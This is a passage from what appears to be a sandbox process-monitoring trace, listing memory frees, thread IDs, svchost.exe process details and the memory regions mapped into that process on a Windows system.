(_Block=0x2390a0) [0149.914] free (_Block=0x2390c0) [0149.914] free (_Block=0x238140) [0149.914] free (_Block=0x239120) [0149.914] free (_Block=0x239140) [0149.914] free (_Block=0x2381c0) [0149.914] free (_Block=0x239160) [0149.914] free (_Block=0x239180) [0149.914] free (_Block=0x238200) [0149.914] free (_Block=0x239220) [0149.914] free (_Block=0x239240) [0149.914] free (_Block=0x2382c0) [0149.915] CoUninitialize () [0149.954] exit (_Code=0) [0149.954] free (_Block=0x238600) [0149.954] free (_Block=0x237d20) [0149.954] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.954] free (_Block=0x236d40) [0149.954] free (_Block=0x2364e0) [0149.954] free (_Block=0x237ce0) [0149.954] free (_Block=0x237ca0) [0149.954] free (_Block=0x237c50) [0149.954] free (_Block=0x237c10) [0149.954] free (_Block=0x237bb0) [0149.954] free (_Block=0x237b30) [0149.954] free (_Block=0x235b20) [0149.954] ??1CHString@@QEAA@XZ () returned 0x7fef77bc96c [0149.954] free (_Block=0x239620) Thread: id = 43 os_tid = 0xcc8 Thread: id = 44 os_tid = 0xcb0 Thread: id = 45 os_tid = 0x850 Thread: id = 46 os_tid = 0xc50 Thread: id = 47 os_tid = 0xd1c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xef4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d99f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1505 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1506 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1507 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1508 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1509 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1510 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1511 start_va = 0x70000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1512 start_va = 0x170000 end_va = 0x1d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1513 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1514 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1515 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1516 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1517 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1518 start_va = 0x390000 end_va = 0x39afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1519 start_va = 0x3a0000 end_va = 0x3acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1520 start_va = 0x3b0000 end_va = 0x3b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1521 start_va = 0x3c0000 end_va = 0x3c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1522 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1523 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1524 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1525 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1526 start_va = 0x590000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1527 start_va = 0x720000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1528 start_va = 0x7e0000 end_va = 0x7e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1529 start_va = 0x7f0000 end_va = 0x7f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1530 start_va = 0x800000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 1531 start_va = 0x830000 end_va = 0x833fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1532 start_va = 0x840000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1533 start_va = 0x8c0000 end_va = 0x8cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1534 start_va = 0x8d0000 end_va = 0x8d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1535 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1536 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 1537 start_va = 0x980000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1538 start_va = 0xa00000 end_va = 0xa1bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1539 start_va = 0xa20000 end_va = 0xa20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1540 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 1541 start_va = 0xac0000 end_va = 0xac0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1542 start_va = 0xad0000 end_va = 0xad0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1543 start_va = 0xae0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 1544 start_va = 0xb00000 end_va = 0xb02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1545 start_va = 0xb10000 end_va = 0xb1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1546 start_va = 0xb30000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 1547 start_va = 0xb40000 end_va = 0xb4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1548 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 1549 start_va = 0xb60000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1550 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 1551 start_va = 0xbf0000 end_va = 0xc09fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 1552 start_va = 0xc10000 end_va = 0xedefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1553 start_va = 0xee0000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1554 start_va = 0xef0000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 1555 start_va = 0xf70000 end_va = 0xf70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1556 start_va = 0xf80000 end_va = 0xf87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1557 start_va = 0xf90000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1558 start_va = 0xfa0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1559 start_va = 0xfb0000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 1560 start_va = 0xfc0000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 1561 start_va = 0x1040000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 1562 start_va = 0x1050000 end_va = 0x1050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1563 start_va = 0x1060000 end_va = 0x1061fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 1564 start_va = 0x1070000 end_va = 0x1070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1565 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1566 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1567 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1568 start_va = 0x1120000 end_va = 0x1127fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1569 start_va = 0x1130000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1570 start_va = 0x1140000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 1571 start_va = 0x11c0000 end_va = 0x1225fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1572 start_va = 0x1230000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 1573 start_va = 0x1240000 end_va = 0x124ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1574 start_va = 0x1250000 end_va = 0x125ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1575 start_va = 0x1260000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 1576 start_va = 0x1270000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1577 start_va = 0x12f0000 end_va = 0x12f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 1578 start_va = 0x1300000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1579 start_va = 0x1310000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 1580 start_va = 0x1320000 end_va = 0x1327fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 1581 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 1582 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1583 start_va = 0x1430000 end_va = 0x14affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 1584 start_va = 0x14b0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 1585 start_va = 0x1550000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001550000" filename = "" Region: id = 1586 start_va = 0x1560000 end_va = 0x156ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001560000" filename = "" Region: id = 1587 start_va = 0x1570000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001570000" filename = "" Region: id = 1588 start_va = 0x1580000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001580000" filename = "" Region: id = 1589 start_va = 0x1590000 end_va = 0x159ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001590000" filename = "" Region: id = 1590 start_va = 0x15a0000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015a0000" filename = "" Region: id = 1591 start_va = 0x1600000 end_va = 0x167ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1592 start_va = 0x1680000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001680000" filename = "" Region: id = 1593 start_va = 0x1690000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001690000" filename = "" Region: id = 1594 start_va = 0x16a0000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016a0000" filename = "" Region: id = 1595 start_va = 0x16b0000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016b0000" filename = "" Region: id = 1596 start_va = 0x16c0000 end_va = 0x16cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016c0000" filename = "" Region: id = 1597 start_va = 0x16d0000 end_va = 0x16dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016d0000" filename = "" Region: id = 1598 start_va = 0x16f0000 end_va = 0x176ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 1599 start_va = 0x17b0000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 1600 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 1601 start_va = 0x18f0000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 1602 start_va = 0x1a50000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 1603 start_va = 0x1b40000 end_va = 0x1bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 1604 start_va = 0x1bc0000 end_va = 0x1cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 1605 start_va = 0x1cc0000 end_va = 0x1d7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1606 start_va = 0x1d80000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1607 start_va = 0x1e20000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1608 start_va = 0x1eb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 1609 start_va = 0x1fd0000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1610 start_va = 0x2070000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 1611 start_va = 0x2110000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 1612 start_va = 0x2210000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 1613 start_va = 0x2230000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1614 start_va = 0x22d0000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1615 start_va = 0x2350000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1616 start_va = 0x23e0000 end_va = 0x245ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1617 start_va = 0x2520000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1618 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1619 start_va = 0x25f0000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 1620 start_va = 0x2670000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1621 start_va = 0x27c0000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1622 start_va = 0x2840000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1623 start_va = 0x2990000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1624 start_va = 0x2a80000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1625 start_va = 0x2b00000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1626 start_va = 0x2b80000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 1627 start_va = 0x2c00000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c00000" filename = "" Region: id = 1628 start_va = 0x2c40000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c40000" filename = "" Region: id = 1629 start_va = 0x2c80000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 1630 start_va = 0x2d30000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 1631 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1632 start_va = 0x2f00000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1633 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 1634 start_va = 0x3310000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 1635 start_va = 0x3390000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1636 start_va = 0x34c0000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 1637 start_va = 0x3580000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 1638 start_va = 0x37d0000 end_va = 0x38cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 1639 start_va = 0x3ab0000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ab0000" filename = "" Region: id = 1640 start_va = 0x3db0000 end_va = 0x3e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 1641 start_va = 0x3e30000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 1642 start_va = 0x4580000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 1643 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1644 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1645 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1646 start_va = 0x4810000 end_va = 0x490ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 1647 start_va = 0x4910000 end_va = 0x4a0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 1648 start_va = 0x4a10000 end_va = 0x4b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 1649 start_va = 0x4b10000 end_va = 0x5b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 1650 start_va = 0x5b80000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1651 start_va = 0x5c00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1652 start_va = 0x5e70000 end_va = 0x5eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 1653 start_va = 0x5fb0000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fb0000" filename = "" Region: id = 1654 start_va = 0x6190000 end_va = 0x620ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006190000" filename = "" Region: id = 1655 start_va = 0x6250000 end_va = 0x62cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 1656 start_va = 0x62d0000 end_va = 0x634ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 1657 start_va = 0x6460000 end_va = 0x64dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006460000" filename = "" Region: id = 1658 start_va = 0x64e0000 end_va = 0x68dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 1659 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1660 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1661 start_va 